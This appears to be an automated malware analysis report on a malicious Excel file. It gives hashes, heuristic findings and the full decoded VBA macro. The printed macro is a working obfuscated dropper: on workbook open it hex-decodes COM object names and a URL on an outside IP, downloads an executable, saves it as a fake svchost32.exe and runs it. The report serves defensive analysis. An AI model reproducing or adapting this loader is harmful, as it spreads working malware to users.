Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 143d170136d6c825…

MALICIOUS

Office (OLE) / .XLS

459.5 KB Created: 2020-09-29 23:04:07 First seen: 2026-06-14
MD5: ed95409467eec03990f43372a987e9d4 SHA-1: 1dd098a59550143e64bd723018ce6019aa8887dd SHA-256: 143d170136d6c825f2d4a0c49b2978302d884bc946ccee97db8c340e629615ea
188 Risk Score

Heuristics 5

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    pphipenpjmmxjntrwlno.write bpermttejpxwkhdzdvds.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set bpermttejpxwkhdzdvds = CreateObject(fmcizyxudlguufmjjnaw("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set bpermttejpxwkhdzdvds = CreateObject(fmcizyxudlguufmjjnaw("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4894 bytes
SHA-256: 5ebd6f33ab467e73fedc8dc862313043d74a132e32cfab60652e88b65e6b2714
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Range("E2:E9").Select
Dim bpermttejpxwkhdzdvds
 Selection.FormatConditions.AddDatabar
Dim pphipenpjmmxjntrwlno
Selection.FormatConditions(Selection.FormatConditions.Count).ShowValue = True
Dim eiiufsjqvcpgjrsmhwci
Selection.FormatConditions(Selection.FormatConditions.Count).SetFirstPriority
With Selection.FormatConditions(1)
.MinPoint.Modify newtype:= xlConditionValueAutomaticMin
.MaxPoint.Modify newtype:= xlConditionValueAutomaticMax
End With
With Selection.FormatConditions(1).BarColor
.Color = 8700771
.TintAndShade = 0
 End With
      Selection.FormatConditions(1).BarFillType = xlDataBarFillGradient
 Selection.FormatConditions(1).Direction = xlContext
 Selection.FormatConditions(1).NegativeBarFormat.ColorType = xlDataBarColor
  Selection.FormatConditions(1).BarBorder.Type = xlDataBarBorderSolid
   Selection.FormatConditions(1).NegativeBarFormat.BorderColorType = _
  xlDataBarColor
  With Selection.FormatConditions(1).BarBorder.Color
  .Color = 8700771
   .TintAndShade = 0
    End With
   Selection.FormatConditions(1).AxisPosition = xlDataBarAxisAutomatic
   With Selection.FormatConditions(1).AxisColor
  .Color = 0
  .TintAndShade = 0
  End With
  With Selection.FormatConditions(1).NegativeBarFormat.Color
  .Color = 255
  .TintAndShade = 0
   End With
 With Selection.FormatConditions(1).NegativeBarFormat.BorderColor
.Color = 255
  .TintAndShade = 0
End With
  Range("C2").Select
 ActiveCell.FormulaR1C1 = "2"
 Range("D2").Select
  ActiveCell.FormulaR1C1 = "2"
 Range("E2").Select
 Application.CutCopyMode = False
  ActiveCell.FormulaR1C1 = " = RC[-2]+RC[-1]"
 Range("C2:E2").Select
  Selection.AutoFill Destination:= Range("C2:E7"), Type:= xlFillDefault
  Range("C2:E7").Select
  Range("C7:E7").Select
  Selection.AutoFill Destination:= Range("C7:E9"), Type:= xlFillDefault
  Range("C7:E9").Select
   Range("C9:E9").Select
  Selection.AutoFill Destination:= Range("C9:E10"), Type:= xlFillDefault
  Range("C9:E10").Select
  Range("C10:E10").Select
  Selection.AutoFill Destination:= Range("C10:E13"), Type:= xlFillDefault
  Range("C10:E13").Select
Set bpermttejpxwkhdzdvds = CreateObject(fmcizyxudlguufmjjnaw("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
  Range("D3").Select
Set pphipenpjmmxjntrwlno = CreateObject(fmcizyxudlguufmjjnaw("41 44 4f 44 42 2e 53 74 72 65 61 6d"))
  ActiveCell.FormulaR1C1 = "5"
Set eiiufsjqvcpgjrsmhwci = CreateObject(fmcizyxudlguufmjjnaw("57 53 63 72 69 70 74 2e 53 68 65 6c 6c "))
  Range("C4").Select
vwugwgoruhjzjfianlrf = fmcizyxudlguufmjjnaw("68 74 74 70 3A 2F 2F 31 38 35 2E 33 33 2E 38 35 2E 35 32 2F 46 52 2F 42 44 4F 2D 31 32 31 38 2E 6A 70 67")
  ActiveCell.FormulaR1C1 = "1"
geuxdamwomcriooggncw = fmcizyxudlguufmjjnaw("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
  Range("C5").Select
RUNCMD = fmcizyxudlguufmjjnaw("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
  ActiveCell.FormulaR1C1 = "2"
bpermttejpxwkhdzdvds.Open "G" + "E" + "T", vwugwgoruhjzjfianlrf, False
  Range("D6").Select
bpermttejpxwkhdzdvds.send
  ActiveCell.FormulaR1C1 = "5"
pphipenpjmmxjntrwlno.Type = 1
  Range("D7").Select
  ActiveCell.FormulaR1C1 = "8"
pphipenpjmmxjntrwlno.Open
  Range("C8").Select
pphipenpjmmxjntrwlno.write bpermttejpxwkhdzdvds.responseBody
   ActiveCell.FormulaR1C1 = "6"
  Range("C10").Select
   ActiveCell.FormulaR1C1 = "2"
   Range("D10").Select
pphipenpjmmxjntrwlno.savetofile geuxdamwomcriooggncw, 2
eiiufsjqvcpgjrsmhwci.Run RUNCMD
  ActiveCell.FormulaR1C1 = "3"
  Range("C11").Select
  ActiveCell.FormulaR1C1 = "6"
  Range("D12").Select
  ActiveCell.FormulaR1C1 = "9"
  Range("C12").Select
End Sub
Public Function fmcizyxudlguufmjjnaw(ByVal yelhwsjcdgxzflhpeypp As String) As String
Dim mvbhcdhdgnsuwxriulhy As String
Dim itoiapedszqakutklugw As String
Dim qtoptlxxoeoygcosgsgn As Long
For qtoptlxxoeoygcosgsgn = 1 To Len(yelhwsjcdgxzflhpeypp)Step 3
mvbhcdhdgnsuwxriulhy = Chr$(Val(" & H" & Mid$(yelhwsjcdgxzflhpeypp, qtoptlxxoeoygcosgsgn, 2)))
itoiapedszqakutklugw = itoiapedszqakutklugw & mvbhcdhdgnsuwxriulhy
Next qtoptlxxoeoygcosgsgn
fmcizyxudlguufmjjnaw = itoiapedszqakutklugw
End Function

Attribute VB_Name = "Sheet 1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True